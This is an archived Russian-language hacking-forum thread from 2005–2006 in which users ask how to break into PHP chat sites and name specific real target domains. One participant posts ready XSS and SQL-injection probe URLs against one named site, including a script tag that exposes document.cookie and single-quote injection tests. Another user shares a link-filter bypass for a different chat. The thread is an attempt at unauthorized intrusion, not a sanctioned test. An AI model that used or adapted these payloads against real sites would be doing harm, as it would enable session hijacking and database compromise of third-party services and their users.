HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Чаты
   
 
 
Опции темы Поиск в этой теме Опции просмотра

Какие есть уязвимости у чатов написанных на php?
  #1  
Старый 07.11.2005, 21:01
Va_RuS
Новичок
Регистрация: 29.10.2005
Сообщений: 12
С нами: 10805464

Репутация: 1
Question Какие есть уязвимости у чатов написанных на php?

Так вот мне интересно узнать, какие есть уязвимости для чатов на php.
Обычные пользователи ничего сделать немогут, но
админы и модеры могут вставлять картинки, писать большими биквами и т.п.

А обычный пользователь так сможет?
Можно ли взломать как-нибудь??
 

  #2  
Старый 07.11.2005, 22:13
vectorg
Постоянный
Регистрация: 07.08.2005
Сообщений: 386
С нами: 10925666

Репутация: 454
По умолчанию

кидай сюда ссылку, я так понимаю что тебя определённый чат интересует?

все чаты разные => уязвимости тоже разные
 

  #3  
Старый 08.11.2005, 20:33
Va_RuS
Новичок
Регистрация: 29.10.2005
Сообщений: 12
С нами: 10805464

Репутация: 1
По умолчанию

Угу... вот ссылочка http://energyfm.ru/chat/
 

  #4  
Старый 17.01.2006, 00:27
RabbiT
Новичок
Регистрация: 09.01.2006
Сообщений: 1
С нами: 10702491

Репутация: 1
По умолчанию

Цитата:
Сообщение от VectorG  
кидай сюда ссылку, я так понимаю что тебя определённый чат интересует?

все чаты разные => уязвимости тоже разные
Немог бы и мне помоч? чат тож написан на пхп. Вот ссылка chat.pnz.ru Геморойно чет с ним....возился возился, + я еще не digital god чтоб пхп ломать. Если можеш помочь в чем либо-заранее благодарен.
 

))
  #5  
Старый 22.01.2006, 01:38
West
Новичок
Регистрация: 18.01.2006
Сообщений: 10
С нами: 10688886

Репутация: 0
По умолчанию ))

Вот вам ребята есчё один чат с тормоз Админом
http://chat.bakililar.az там админ поставил филбьтрацию на ссылки но есть обход фильтра
пример:http://menya.net=)) (без пробела смаил) да вот есчё что там происходит если ставиш вот етот смаил (Дополнительные команды [любовь] ( :love/bis: )-2 раза то тебя кидает на 7 мин я им на форуме да нетока я все кто с етим сталкивался Админу писали а он хотьбы что !!!
P.S. чат Бородинский

Последний раз редактировалось West; 22.01.2006 в 01:42.. Причина: Не поставил дваеточие ))
 

  #6  
Старый 09.11.2005, 23:18
Va_RuS
Новичок
Регистрация: 29.10.2005
Сообщений: 12
С нами: 10805464

Репутация: 1
По умолчанию

Ну так как сделать то?
 

  #7  
Старый 10.11.2005, 00:48
vectorg
Постоянный
Регистрация: 07.08.2005
Сообщений: 386
С нами: 10925666

Репутация: 454
По умолчанию

дай логин и пароль а то у них там с регистрацией проблемы
 

  #8  
Старый 10.11.2005, 00:52
Va_RuS
Новичок
Регистрация: 29.10.2005
Сообщений: 12
С нами: 10805464

Репутация: 1
По умолчанию

чел свои не дам)) но у мя там ник завалялся... ща...
логин Vaz*****
пас **********
-----------------
за логином и пассом стучите в ПМ

Последний раз редактировалось Va_RuS; 11.11.2005 в 15:12..
 

  #9  
Старый 10.11.2005, 10:16
XgLuiR
Новичок
Регистрация: 07.11.2005
Сообщений: 18
С нами: 10792504

Репутация: 0
По умолчанию

Чат чемто похож на Бородинский
 

  #10  
Старый 10.11.2005, 13:40
vectorg
Постоянный
Регистрация: 07.08.2005
Сообщений: 386
С нами: 10925666

Репутация: 454
По умолчанию

вот по быстрому нашёл...

http://energyfm.ru/chat/history.php?idchat=energy&what="><script>alert(doc ument.cookie)</script>
http://energyfm.ru/chat/history.php?idchat='
http://energyfm.ru/chat/getnewmes.php?idchat='

вот как сообщение выглядят в коде...

parent.window.tickerDiv.innerHTML+'<p style="color: br;"><b><font color="#0000FF">Vaz21043</font></b> : \'&lt;&gt;()\'&quot;</p>';

сдесь можно посмотреть все сообщения в коде...

http://energyfm.ru/chat/getnewmes.php?idchat=energy

не забудь про репутацию (слева плюсик нажми зелёненький)
 
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Books PHP FRAGNATIC PHP 186 21.02.2010 02:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.